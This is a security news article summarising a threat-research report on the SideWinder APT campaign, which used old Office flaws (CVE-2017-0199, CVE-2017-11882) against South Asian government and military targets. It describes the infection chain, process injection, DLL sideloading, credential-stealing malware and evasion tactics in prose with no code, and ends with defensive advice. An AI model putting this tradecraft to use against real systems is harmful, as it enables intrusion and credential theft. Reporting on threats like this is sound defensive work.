SideWinder APT Hackers Exploits Legacy Office Vulnerabilities to Deploy Malware Undetected

The Acronis Threat Research Unit (TRU) has revealed an advanced campaign believed to be orchestrated by the SideWinder advanced persistent threat (APT) group.

This operation, running through early 2025, has primarily targeted high-value government and military institutions across Sri Lanka, Bangladesh, and Pakistan, exploiting unpatched legacy Microsoft Office vulnerabilities to deploy credential-stealing malware while evading contemporary detection mechanisms.

At the heart of SideWinder’s strategy is a blend of old and new: attackers craft spear-phishing emails that impersonate local governmental bodies or high-level organizations, embedding malicious Word or RTF attachments.

These documents exploit CVE-2017-0199 and CVE-2017-11882, vulnerabilities that have persisted in many organizations due to inadequate patch management.

CVE-2017-0199 enables remote code execution by leveraging malicious external object references in Office files, while CVE-2017-11882 abuses a memory corruption bug in the legacy Equation Editor component, allowing attackers to execute arbitrary code upon document opening.

Uniquely, SideWinder integrates geofenced payload distribution the attackers’ servers deliver the next infection stage only if the victim’s IP and User-Agent headers match the intended targets in Bangladesh, Sri Lanka, or Pakistan.

Non-targeted users receive benign decoy documents or error messages, thwarting analysis and minimizing detection.

Once the exploitation chain begins, a shellcode-based loader, embedded within the RTF payload, triggers.

This shellcode is heavily obfuscated, employing memory inspection and sandbox evasion techniques, only advancing if the environment appears legitimate.

It downloads a second-stage binary, individually encoded for each victim by server-side polymorphism, and injects it into a trusted process (typically explorer.exe) using classic Windows API methods like VirtualAllocEx and CreateRemoteThread.

Credential Harvesting

The third-stage payload is a DLL known internally as “StealerBot.CppInstallerDocx.dll.”

This module, executed via rundll32.exe or DLL sideloading through a legitimate signed executable (TapiUnattend.exe), collects a wide array of sensitive data: usernames, system specifications, drive details, MAC address, network configuration, and installed AV products.

This information is base64-encoded, obfuscated, and sent back to the command-and-control (C2) server, which is frequently rotated to evade IP/domain blocklists.

The attackers employ persistence via Windows Startup folder LNK (shortcut) files that trigger the malicious chain on reboot.

Further, the final malware components are protected with XOR encoding and loaded in-memory, avoiding disk writes and complicating forensics.

StealerBot is proficient at both exfiltrating credentials and maintaining access, using stealthy communications and layering encrypted C2 channels with dynamic domain infrastructure.

Infrastructure and Targeting

TRU analysts observed a significant uptick in related malicious domains through early 2025, reflecting SideWinder’s resource commitment and operational tempo.

The C2 domains registered in bursts and rotated frequently are crafted to impersonate government, financial, or defense organizations, enhancing social engineering credibility.

The group’s lures are highly customized; notable examples include invitations to military events or official economic briefings, tailored for Sri Lanka’s Army 55 Division and the Central Bank of Sri Lanka’s IT directorate.

While the campaign references a broad range of high-value institutions, confirmed victimology is currently limited to the Sri Lankan and Bangladeshi military and financial sectors, indicating a combination of direct targeting and credibility-boosting impersonation in SideWinder’s phishing emails.

The attackers maintain operational security by generating unique payloads per target, using server-side polymorphism to frustrate signature-based detection and automatic sample correlation.

Organizations in South Asia particularly those in government, military, or critical infrastructure are urged to enforce immediate patching of legacy Office vulnerabilities, especially CVE-2017-0199 and CVE-2017-11882.

Disabling macros and external template loading, restricting the use of mshta.exe, wscript.exe, and powershell.exe, and deploying behavioral detection tools that flag anomalous child processes or memory injection are critical steps.

Network-level filtering against known malicious domains and user education to recognize spear-phishing hallmarks are also essential to reduce risk.

This campaign reinforces how resilience against well-known exploits demands not just advanced detection, but also relentless attention to basic security hygiene.

SideWinder’s evolving tactics combining geofenced distribution, shellcode loaders, DLL sideloading, and rapid infrastructure churn demonstrate the persistent threat posed by APTs leveraging “forgotten” vulnerabilities.

Indicators of Compromise (IOCs)

Find this News Interesting! Follow us on Google News, LinkedIn, & X to Get Instant Updates!